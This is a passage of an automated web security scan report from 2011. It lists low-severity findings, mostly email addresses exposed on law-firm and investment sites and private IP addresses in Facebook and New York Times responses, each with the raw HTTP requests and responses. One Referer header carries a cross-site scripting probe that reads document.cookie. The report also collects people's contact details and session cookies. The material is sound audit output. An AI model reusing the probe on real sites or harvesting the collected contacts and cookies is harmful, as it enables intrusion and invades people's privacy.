Date: Thu, 12 May 2011 11:40:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Set-Cookie: CFID=ee3f1093%2D41a1%2D4002%2D9045%2D87d36bf03195; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:14 GMT
Set-Cookie: CFTOKEN=0; domain=www.pomerantzlaw.com; path=/; expires=Fri, 10-May-2041 19:32:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
<br />&nbsp;&nbsp;&nbsp; CKx shareholders seeking more information about this acquisition are advised to contact Gustavo Bruckner, Esq. at gfbruckner@pomlaw.com or 212-661-1100 or toll free at 888-476-6529, ext. 302. Shareholders may also contact Rachelle R. Boyle at rrboyle@pomlaw.com or 212-661-1100 or 888-476-6529, ext. 237.</p>
...[SNIP]...

22.79. http://www.pomerantzlaw.com/contact-us.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pomerantzlaw.com
Path:   /contact-us.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact-us.html HTTP/1.1
Host: www.pomerantzlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pomerantzlaw.com/cases.html?action=caseDetail&CaseID=102
Cookie: CFID=b0dfc93c%2D1d63%2D4672%2D97a7%2D5d72752495c2; CFTOKEN=0; __utma=182215078.918065188.1305200941.1305200941.1305200941.1; __utmb=182215078.1.10.1305200941; __utmc=182215078; __utmz=182215078.1305200941.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:49:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Content-Type: text/html; charset=UTF-8
Content-Length: 10359


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/ja
...[SNIP]...
<input style="width: 156px; height: 22px;" name="admin_email_addr" size="20" type="hidden" value="info@pomlaw.com ,josh@emailmessaging.net" />
...[SNIP]...

22.80. http://www.privateequityinfo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.privateequityinfo.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Set-Cookie: PHPSESSID=eq1oat81k7im20tchffed7ii03; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25258

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Private Equity Firms, Hedge Funds, Mezzanine Investors, Small Business Investment Companies (SBIC), Valuation Fi
...[SNIP]...
<meta name="author" content="Andy Jones private equity info privateequityinfo.com info@privateequityinfo.com (512)771-3943">
...[SNIP]...
<meta http-equiv="reply-to" content="info@privateequityinfo.com">
...[SNIP]...
<a href="mailto:subscriptions@privateequityinfo.com" class="newGraySmall"><u>subscriptions@privateequityinfo.com</u>
...[SNIP]...

22.81. http://www.privateequityinfo.com/forgotpassword.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.privateequityinfo.com
Path:   /forgotpassword.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /forgotpassword.php HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
Referer: http://www.privateequityinfo.com/product_details.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bvv46lr2q5ms0uqefrt9jbsal0; __utma=222922074.264370130.1305198145.1305198145.1305198145.1; __utmc=222922074; __utmz=222922074.1305198145.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=222922074

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:14:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Content-Type: text/html
Content-Length: 21431

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Private Equity Info - Forgot Your Password?</title>
<meta name="description" content="Database of private equit
...[SNIP]...
<meta name="author" content="Andy Jones private equity info privateequityinfo.com info@privateequityinfo.com (512)771-3943">
...[SNIP]...
<meta http-equiv="reply-to" content="info@privateequityinfo.com">
...[SNIP]...
<a href="mailto:subscriptions@privateequityinfo.com" class="newGraySmall"><u>subscriptions@privateequityinfo.com</u>
...[SNIP]...

22.82. http://www.privateequityinfo.com/product_details.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.privateequityinfo.com
Path:   /product_details.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /product_details.php HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
Referer: http://www.privateequityinfo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bvv46lr2q5ms0uqefrt9jbsal0; __utma=222922074.264370130.1305198145.1305198145.1305198145.1; __utmb=222922074; __utmc=222922074; __utmz=222922074.1305198145.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:14:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 58851

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Product details</title>
<meta name="description" content="Database of Private Equity Firms, Hedge Funds, Mezzan
...[SNIP]...
<meta name="author" content="Andy Jones private equity info privateequityinfo.com info@privateequityinfo.com (512)771-3943">
...[SNIP]...
<meta http-equiv="reply-to" content="info@privateequityinfo.com">
...[SNIP]...
<a href="mailto:subscriptions@privateequityinfo.com" class="newGraySmall"><u>subscriptions@privateequityinfo.com</u>
...[SNIP]...

22.83. http://www.provequity.com/news/releases/SRA%20Press%20Release%204%201%2011.PDF

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.provequity.com
Path:   /news/releases/SRA%20Press%20Release%204%201%2011.PDF

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news/releases/SRA%20Press%20Release%204%201%2011.PDF HTTP/1.1
Host: www.provequity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASAQTRCB=LPLHPCLDNJEEPELPGFENDPFK

Response

HTTP/1.1 200 OK
Content-Length: 120431
Content-Type: application/pdf
Last-Modified: Fri, 01 Apr 2011 14:53:26 GMT
Accept-Ranges: bytes
ETag: "4e29608e7cf0cb1:913"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:49:23 GMT

%PDF-1.3
%....
1 0 obj
<<
/Fields []
/DR 63 0 R
>>
endobj
2 0 obj
<<
/Type /Catalog
/Pages 65 0 R
/AcroForm 1 0 R
>>
endobj
3 0 obj
<<
/Type /Page
/Parent 65 0 R
/MediaBox [0 0 612 792]
/Resources <
...[SNIP]...
</Type /Action /S /URI /URI (mailto:sheila_blackwell@sra.com)>
...[SNIP]...
</Type /Action /S /URI /URI (mailto:acole@sardverb.com)>
...[SNIP]...
</Type /Action /S /URI /URI (mailto:lneugart@sardverb.com)>
...[SNIP]...
</Type /Action /S /URI /URI (mailto:david_mutryn@sra.com)>
...[SNIP]...

22.84. http://www.soundpatheview.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundpatheview.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.soundpatheview.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tuckerellis.com/info/client-access

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:02 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/4.4.9
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title
...[SNIP]...
<a href="mailto:info@soundpath.net?subject=Soundpath e-View">
...[SNIP]...

22.85. http://www.stroock.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stroock.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.stroock.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Stroock+%26+Stroock+%26+Lavan&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 12:21:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6906920;expires=Sat, 04-May-2041 12:21:44 GMT;path=/
Set-Cookie: CFTOKEN=39383083;expires=Sat, 04-May-2041 12:21:44 GMT;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv
...[SNIP]...
<a href='http://showroom.multivisioninc.com/share.do?id=134326&key=0KyxT5t3s6aNjz9eBv9AP2q72uewMezi&email=kzerbe@rubenstein.com' target='_blank'>
...[SNIP]...

22.86. http://www.tpg.com/contact.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tpg.com
Path:   /contact.html

Issue detail

The following email address was disclosed in the response:

Request

GET /contact.html HTTP/1.1
Host: www.tpg.com
Proxy-Connection: keep-alive
Referer: http://www.tpg.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 9294
Content-Type: text/html
Last-Modified: Mon, 02 May 2011 16:00:04 GMT
Accept-Ranges: bytes
ETag: "b32b590e28cc1:4e5d1"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:24:23 GMT

<html>
<head>
<title>TPG : About TPG</title>
<meta name="description" content="TPG">
<meta name="keywords" content="TPG">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
...[SNIP]...
<a href="mailto:owen@blicksilverpr.com" class="HeaderBlue"><u>owen@blicksilverpr.com</u>
...[SNIP]...

22.87. http://www.tuckerellis.com/attorneys/index

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tuckerellis.com
Path:   /attorneys/index

Issue detail

The following email addresses were disclosed in the response:

Request

GET /attorneys/index?first_name=&last_name=&law_school=0&practice=0&office=0&language=0&admission=0&industry=0&affiliation=0&school=0&keywords=&action=attorneys&submit.x=41&submit.y=7 HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tuckerellis.com/attorneys/search
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.6.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:23:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

22.88. http://www.tuckerellis.com/attorneys/k-anderson

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tuckerellis.com
Path:   /attorneys/k-anderson

Issue detail

The following email address was disclosed in the response:

Request

GET /attorneys/k-anderson HTTP/1.1
Host: www.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tuckerellis.com/attorneys/index?first_name=&last_name=&law_school=0&practice=0&office=0&language=0&admission=0&industry=0&affiliation=0&school=0&keywords=&action=attorneys&submit.x=41&submit.y=7
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.7.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:24:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:michele.anderson@tuckerellis.com" title="Email Attorney">
...[SNIP]...

22.89. http://www.vcprodatabase.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vcprodatabase.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: www.vcprodatabase.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Length: 8251
Content-Type: text/html
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:02:32 GMT

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="robots" content="noindex, nofollow">
<link REL="stylesheet" TYPE="text/css" HREF="../style/co
...[SNIP]...
<a href="mailto:support@vcprodatabase.com">support@vcprodatabase.com</a>
...[SNIP]...

23. Private IP addresses disclosed
There are 18 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


23.1. http://connect.facebook.net/en_US/all.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If-None-Match: "f6002135b2a7a45a20f6832033a03c19"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "db0e54357e9bac109c4a31ec215f595b"
X-FB-Server: 10.33.26.114
X-Cnection: close
Cache-Control: public, max-age=971
Expires: Thu, 12 May 2011 11:19:21 GMT
Date: Thu, 12 May 2011 11:03:10 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 118049

/*1305152601,169941618,JIT Construction: v377111,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

23.2. http://connect.facebook.net/en_US/all.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js HTTP/1.1
Host: connect.facebook.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed4e86dd7255/mergers-acquisitions/

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "db0e54357e9bac109c4a31ec215f595b"
X-FB-Server: 10.32.104.129
X-Cnection: close
Cache-Control: public, max-age=653
Expires: Thu, 12 May 2011 11:36:57 GMT
Date: Thu, 12 May 2011 11:26:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 118049

/*1305178497,169896065,JIT Construction: v377111,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

23.3. http://meter-svc.nytimes.com/meter.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://meter-svc.nytimes.com
Path:   /meter.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /meter.js?url=http%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F09%2Fprivate-equity-has-a-horse-in-this-race%2F&referer=&callback=c1305198171060 HTTP/1.1
Host: meter-svc.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=t*26edd=4e32303f:1305112022; nyt-m=E3DB375A9111923DC1D65DE89ACF26F3&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.9.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:03:07 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Pragma: no-cache
Server: nginx/0.7.59
Set-Cookie: nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; expires=Tue, 10-May-2016 11:03:07 GMT; path=/; domain=.nytimes.com
Content-Length: 114
Connection: keep-alive

c1305198171060({"hitPaywall":false,"counted":false,"loggedIn":false,"hash":"D30DFD30595EF4324E4B50EE62114094"});

23.4. http://static.ak.fbcdn.net/connect/xd_proxy.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=1 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.138.16.184
Vary: Accept-Encoding
Cache-Control: public, max-age=1216
Expires: Thu, 12 May 2011 11:59:00 GMT
Date: Thu, 12 May 2011 11:38:44 GMT
Connection: close
Content-Length: 3017

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...

23.5. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_925756%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_925756&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_925756&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.205.53
X-Cnection: close
Date: Thu, 12 May 2011 11:03:01 GMT
Content-Length: 0


23.6. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=116027085089150&app_id=116027085089150&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df59f54ef8%26origin%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Ff3dc5c8b3%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df1d00aca1%26origin%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Ff3dc5c8b3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32b0f9a04%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df195749e5%26origin%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Ff3dc5c8b3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32b0f9a04&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df156192d64%26origin%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Ff3dc5c8b3%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df32b0f9a